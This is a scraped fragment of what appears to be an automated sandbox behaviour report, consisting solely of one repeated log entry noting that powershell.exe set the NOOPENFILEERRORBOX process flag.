                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
